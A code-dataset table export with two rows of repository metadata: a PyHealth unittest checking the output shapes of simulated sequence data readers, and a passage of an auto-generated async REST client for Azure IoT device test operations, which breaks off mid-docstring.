hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6f613e57d2041c089c6d8b96ec4cac3ee4b9ae3d | 8,373 | py | Python | pyhealth/test/test_datareader.py | rkalahasty/PyHealth | 1ee0859d8d39a7fc6f8df48ef8d2bf6c17dcf4a5 | [
"BSD-2-Clause"
] | 485 | 2020-08-03T20:04:21.000Z | 2022-02-25T13:35:43.000Z | pyhealth/test/test_datareader.py | rkalahasty/PyHealth | 1ee0859d8d39a7fc6f8df48ef8d2bf6c17dcf4a5 | [
"BSD-2-Clause"
] | 6 | 2020-08-06T01:07:45.000Z | 2021-10-15T21:49:42.000Z | pyhealth/test/test_datareader.py | rkalahasty/PyHealth | 1ee0859d8d39a7fc6f8df48ef8d2bf6c17dcf4a5 | [
"BSD-2-Clause"
] | 98 | 2020-08-04T01:04:38.000Z | 2022-02-09T10:36:03.000Z | # -*- coding: utf-8 -*-
from __future__ import division
from __future__ import print_function
import os
import sys
import unittest
import numpy as np
import torch
import zipfile
import shutil
from pyhealth.data.simulation_data import generate_simulation_sequence_data
from pyhealth.data.simulation_data import generate_simulation_image_data
from pyhealth.data.simulation_data import generate_simulation_ecg_data
from pyhealth.data.data_reader.sequence import dl_reader as seq_dl_reader
from pyhealth.data.data_reader.sequence import ml_reader as seq_ml_reader
from pyhealth.data.data_reader.image import dl_reader as image_dl_reader
from pyhealth.data.data_reader.ecg import dl_reader as ecg_dl_reader
from pyhealth.data.data_reader.ecg import ml_reader as ecg_ml_reader
class TestDatareader(unittest.TestCase):
def test_seq_ml_reader(self):
test_n_sample = 10
test_batch_size = 2
test_n_feat = 30
test_sub_group = 3
data = generate_simulation_sequence_data(n_sample = test_n_sample,
n_feat = test_n_feat,
task = 'binaryclass')()
seq_ds = seq_ml_reader.DatasetReader(data,
sub_group = test_sub_group,
data_type = 'aggregation',
task_type = 'binaryclass').get_data()
assert np.shape(seq_ds['X'])[0] == test_n_sample
assert np.shape(seq_ds['X'])[1] == test_n_feat * test_sub_group
assert np.shape(seq_ds['Y'])[0] == test_n_sample
assert np.shape(seq_ds['Y'])[1] == 1
test_n_sample = 10
test_batch_size = 2
test_n_feat = 30
test_sub_group = 3
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = test_n_sample,
n_feat = test_n_feat,
task = 'multiclass',
n_class = test_n_class)()
seq_ds = seq_ml_reader.DatasetReader(data,
sub_group = test_sub_group,
data_type = 'aggregation',
task_type = 'multiclass').get_data()
assert np.shape(seq_ds['X'])[0] == test_n_sample
assert np.shape(seq_ds['X'])[1] == test_n_feat * test_sub_group
assert np.shape(seq_ds['Y'])[0] == test_n_sample
assert np.shape(seq_ds['Y'])[1] == 1
test_n_sample = 10
test_batch_size = 2
test_n_feat = 30
test_sub_group = 3
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = test_n_sample,
n_feat = test_n_feat,
task = 'multilabel',
n_class = test_n_class)()
seq_ds = seq_ml_reader.DatasetReader(data,
sub_group = test_sub_group,
data_type = 'aggregation',
task_type = 'multilabel').get_data()
assert np.shape(seq_ds['X'])[0] == test_n_sample
assert np.shape(seq_ds['X'])[1] == test_n_feat * test_sub_group
assert np.shape(seq_ds['Y'])[0] == test_n_sample
assert np.shape(seq_ds['Y'])[1] == test_n_class
def test_seq_dl_reader(self):
test_batch_size = 2
test_n_feat = 30
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'binaryclass',
n_class = 2)()
seq_ds = seq_dl_reader.DatasetReader(data,data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert len(databatch['Y'].size()) == 1
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'multiclass',
n_class = test_n_class)()
seq_ds = seq_dl_reader.DatasetReader(data,data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert databatch['Y'].size()[1] == test_n_class
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
test_n_class = 3
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'multilabel',
n_class = test_n_class)()
seq_ds = seq_dl_reader.DatasetReader(data,data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert databatch['Y'].size()[1] == test_n_class
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
test_batch_size = 2
test_n_feat = 30
data = generate_simulation_sequence_data(n_sample = 10,
n_feat = test_n_feat,
task = 'regression',
n_class = 2)()
seq_ds = seq_dl_reader.DatasetReader(data,data_type = 'aggregation')
seq_loader = torch.utils.data.DataLoader(seq_ds, batch_size=test_batch_size)
for batch_idx, databatch in enumerate(seq_loader):
assert databatch['X'].size()[0] == test_batch_size
assert databatch['X'].size()[2] == test_n_feat
assert databatch['M'].size()[0] == test_batch_size
assert databatch['cur_M'].size()[0] == test_batch_size
assert databatch['Y'].size()[0] == test_batch_size
assert len(databatch['Y'].size()) == 1
assert databatch['T'].size()[0] == test_batch_size
assert databatch['X'].size()[1] == databatch['M'].size()[1]
assert databatch['X'].size()[1] == databatch['cur_M'].size()[1]
assert databatch['X'].size()[1] == databatch['T'].size()[1]
| 52.33125 | 84 | 0.541144 | 1,001 | 8,373 | 4.201798 | 0.073926 | 0.049929 | 0.089634 | 0.095102 | 0.90894 | 0.90894 | 0.901331 | 0.875178 | 0.86234 | 0.814313 | 0 | 0.019087 | 0.343007 | 8,373 | 159 | 85 | 52.660377 | 0.745501 | 0.002508 | 0 | 0.811189 | 0 | 0 | 0.033054 | 0 | 0 | 0 | 0 | 0 | 0.363636 | 1 | 0.013986 | false | 0 | 0.118881 | 0 | 0.13986 | 0.006993 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f696815f75c629bee5fa5efeabfc821330d60c7 | 48,343 | py | Python | test-runner/adapters/rest/generated/e2erestapi/aio/operations_async/_device_operations_async.py | brycewang-microsoft/iot-sdks-e2e-fx | 211c9c2615a82076bda02a27152d67366755edbf | [
"MIT"
] | null | null | null | test-runner/adapters/rest/generated/e2erestapi/aio/operations_async/_device_operations_async.py | brycewang-microsoft/iot-sdks-e2e-fx | 211c9c2615a82076bda02a27152d67366755edbf | [
"MIT"
] | null | null | null | test-runner/adapters/rest/generated/e2erestapi/aio/operations_async/_device_operations_async.py | brycewang-microsoft/iot-sdks-e2e-fx | 211c9c2615a82076bda02a27152d67366755edbf | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import HttpOperationError
from ... import models
class DeviceOperations:
"""DeviceOperations async operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
async def connect(
self, transport_type, connection_string, ca_certificate=None, *, custom_headers=None, raw=False, **operation_config):
"""Connect to the azure IoT Hub as a device.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param connection_string: connection string
:type connection_string: str
:param ca_certificate:
:type ca_certificate: ~e2erestapi.models.Certificate
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.connect.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['connectionString'] = self._serialize.query("connection_string", connection_string, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if ca_certificate is not None:
body_content = self._serialize.body(ca_certificate, 'Certificate')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
connect.metadata = {'url': '/device/connect/{transportType}'}
async def disconnect(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Disconnect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.disconnect.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
disconnect.metadata = {'url': '/device/{connectionId}/disconnect'}
async def create_from_connection_string(
self, transport_type, connection_string, ca_certificate=None, *, custom_headers=None, raw=False, **operation_config):
"""Create a device client from a connection string.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param connection_string: connection string
:type connection_string: str
:param ca_certificate:
:type ca_certificate: ~e2erestapi.models.Certificate
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.create_from_connection_string.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['connectionString'] = self._serialize.query("connection_string", connection_string, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
if ca_certificate is not None:
body_content = self._serialize.body(ca_certificate, 'Certificate')
else:
body_content = None
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_from_connection_string.metadata = {'url': '/device/createFromConnectionString/{transportType}'}
async def create_from_x509(
self, transport_type, x509, *, custom_headers=None, raw=False, **operation_config):
"""Create a device client from X509 credentials.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param x509:
:type x509: object
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.create_from_x509.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(x509, 'object')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_from_x509.metadata = {'url': '/device/createFromX509/{transportType}'}
async def create_from_symmetric_key(
self, transport_type, device_id, hostname, symmetric_key, *, custom_headers=None, raw=False, **operation_config):
"""Create a device client from a symmetric key.
:param transport_type: Transport to use. Possible values include:
'amqp', 'amqpws', 'mqtt', 'mqttws', 'http'
:type transport_type: str
:param device_id:
:type device_id: str
:param hostname: name of the host to connect to
:type hostname: str
:param symmetric_key: key to use for connection
:type symmetric_key: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ConnectResponse or ClientRawResponse if raw=true
:rtype: ~e2erestapi.models.ConnectResponse or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.create_from_symmetric_key.metadata['url']
path_format_arguments = {
'transportType': self._serialize.url("transport_type", transport_type, 'str'),
'deviceId': self._serialize.url("device_id", device_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['hostname'] = self._serialize.query("hostname", hostname, 'str')
query_parameters['symmetricKey'] = self._serialize.query("symmetric_key", symmetric_key, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ConnectResponse', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_from_symmetric_key.metadata = {'url': '/device/createFromSymmetricKey/{deviceId}/{transportType}'}
async def connect2(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Connect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.connect2.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
connect2.metadata = {'url': '/device/{connectionId}/connect2'}
async def reconnect(
self, connection_id, force_renew_password=None, *, custom_headers=None, raw=False, **operation_config):
"""Reconnect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param force_renew_password: True to force SAS renewal
:type force_renew_password: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.reconnect.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if force_renew_password is not None:
query_parameters['forceRenewPassword'] = self._serialize.query("force_renew_password", force_renew_password, 'bool')
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
reconnect.metadata = {'url': '/device/{connectionId}/reconnect'}
async def disconnect2(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Disconnect the device.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.disconnect2.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
disconnect2.metadata = {'url': '/device/{connectionId}/disconnect2'}
async def destroy(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Disconnect and destroy the device client.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.destroy.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
destroy.metadata = {'url': '/device/{connectionId}/destroy'}
async def enable_methods(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Enable methods.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.enable_methods.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
enable_methods.metadata = {'url': '/device/{connectionId}/enableMethods'}
async def wait_for_method_and_return_response(
self, connection_id, method_name, request_and_response, *, custom_headers=None, raw=False, **operation_config):
"""Wait for a method call, verify the request, and return the response.
This is a workaround to deal with SDKs that only have method call
operations that are sync. This function responds to the method with
the payload of this function, and then returns the method parameters.
Real-world implemenatations would never do this, but this is the only
same way to write our test code right now (because the method handlers
for C, Java, and probably Python all return the method response instead
of supporting an async method call).
:param connection_id: Id for the connection
:type connection_id: str
:param method_name: name of the method to handle
:type method_name: str
:param request_and_response:
:type request_and_response:
~e2erestapi.models.MethodRequestAndResponse
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.wait_for_method_and_return_response.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str'),
'methodName': self._serialize.url("method_name", method_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(request_and_response, 'MethodRequestAndResponse')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
wait_for_method_and_return_response.metadata = {'url': '/device/{connectionId}/waitForMethodAndReturnResponse/{methodName}'}
async def enable_c2d_messages(
self, connection_id, *, custom_headers=None, raw=False, **operation_config):
"""Enable c2d messages.
:param connection_id: Id for the connection
:type connection_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.enable_c2d_messages.metadata['url']
path_format_arguments = {
'connectionId': self._serialize.url("connection_id", connection_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters)
response = await self._client.async_send(request, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise HttpOperationError(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
enable_c2d_messages.metadata = {'url': '/device/{connectionId}/enableC2dMessages'}
async def send_event(
self, connection_id, event_body, *, custom_headers=None, raw=False, **operation_config):
"""Send an event.
:param connection_id: Id for the connection
